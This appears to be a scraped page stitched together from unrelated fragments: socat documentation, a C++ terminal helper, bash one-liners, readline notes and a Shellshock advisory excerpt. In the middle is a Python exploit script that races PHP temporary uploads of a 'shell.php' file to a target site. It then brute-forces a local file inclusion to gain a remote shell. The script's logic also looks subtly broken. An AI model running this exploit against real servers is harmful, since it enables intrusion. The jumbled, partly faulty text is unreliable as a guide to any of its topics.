6 private links
socat address chains concatenate internal modules that communicate bidirectionally. For example, a chain that establishes an encrypted connection to a SOCKS server might look something like this (parameters and options dropped):
"SOCKS:... | OPENSSL-CLIENT | TCP:..."
If you have a program that implements a new encryption protocol the chain could be changed to:
"SOCKS:... | EXEC:myencrypt.sh | TCP:..."
The complete example:
socat - "SOCKS:www.domain.com:80 | EXEC:myencrypt.sh | TCP:encrypt.secure.org:444"
The myencrypt.sh script would be a wrapper around some myencrypt program. It must adhere to a few rules: it reads and writes cleartext data on its left side (FDs 0 and 1), and it reads and writes encrypted data on its right side (FDs 3 and 4). Thus, cleartext data comes in from the left on FD 0, is encrypted, and is sent to the right side through FD 4. Encrypted data comes in from the right on FD 3, is decrypted, and is sent to the left side through FD 1. It does not matter whether the encryption protocol requires negotiations or multiple packets on the right side.
#include <iostream>
#include <string>

// Shrink the scrolling region by one row at the bottom without disturbing
// the text already on screen. nr_rows is the terminal height in rows.
void set_scroll_region(int nr_rows) {
    // scroll down a bit to avoid visual glitch when the screen
    // area shrinks by one row
    std::cout << "\n";
    // save cursor (DECSC)
    std::cout << "\0337";
    // set scroll region (this will place the cursor in the top left)
    std::cout << "\033[0;" << std::to_string(nr_rows - 1) << "r";
    // restore cursor (DECRC) but ensure it's inside the scrolling area
    std::cout << "\0338";
    static const char *move_cursor_up = "\033[1A";
    std::cout << move_cursor_up;
}
# Tell the user (on stderr) that we are waiting for piped input
printf >&2 '%s: reading from stdin...' "$(basename "$0")"
stdin=$(cat <&0)
# Clear the status line once the input has arrived
printf >&2 '\r\033[0K'
echo "$stdin"
import itertools
import string
import sys

import requests

print('[+] Trying to win the race')
# Upload the same file repeatedly so that a temporary copy is likely to be
# present under /tmp while the inclusion below is attempted
f = {'file': open('shell.php', 'rb')}
for _ in range(4096 * 4096):
    requests.post('http://target.com/index.php?c=index.php', files=f)

print('[+] Bruteforcing the inclusion')
# Guess the six-character suffix of the temporary upload name
for chars in itertools.combinations(string.ascii_letters + string.digits, 6):
    fname = ''.join(chars)
    url = 'http://target.com/index.php?c=/tmp/php' + fname
    r = requests.get(url)
    if 'load average' in r.text:  # <?php echo system('uptime');
        print('[+] We have got a shell: ' + url)
        sys.exit(0)
print('[x] Something went wrong, please try again')
The Principle of Least Privilege says that software shouldn't be executed with more authority than it needs to get its job done. Unfortunately, following this principle is hard; most operating systems are configured so that the scripts and programs you run can do anything you can.
Although the Readline library comes with a set of default keybindings, it is possible to modify these by putting commands into a .inputrc file, typically in the home directory. The name of this file is taken from the value of the shell variable INPUTRC. If that variable is unset, the default is ~/.inputrc. If that file does not exist or cannot be read, the ultimate default is /etc/inputrc.
Stephane Chazelas discovered a vulnerability in bash, related to how
environment variables are processed: trailing code in function
definitions was executed, independent of the variable name.
In many common configurations, this vulnerability is exploitable over
the network.
Some stuff on bash programming
# reverse the byte order of a 32-bit value given in hex (256 -> 00000100 -> 00010000)
echo $(printf %08X 256 | grep -o .. | tac | tr -d '\n')
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
# print the command line and PID of every running python process
for i in $(pidof python); do cat /proc/$i/cmdline | tr "\0" " " | sed "s/$/ $i\n/"; done
Check if stdout is a tty, from different languages.